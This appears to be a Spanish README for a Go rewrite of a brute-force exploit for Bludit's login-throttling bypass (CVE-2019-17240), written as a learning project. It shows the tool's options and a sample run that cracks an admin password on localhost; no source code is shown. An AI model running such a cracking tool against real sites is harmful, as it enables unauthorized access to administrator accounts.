
Herramienta de fuerza bruta basada en Go que explota la evasión de mitigación de fuerza bruta de Bludit (CVE-2019-17240) para el descifrado automatizado de contraseñas contra páginas de inicio de sesión de administrador.
Este es un pequeño proyecto donde reescribo este script de Python en Golang. El propósito de este proyecto era aprender Golang y entender cómo funciona este exploit.
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
Excepto la opción de hilos, todas las demás opciones son obligatorias.
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password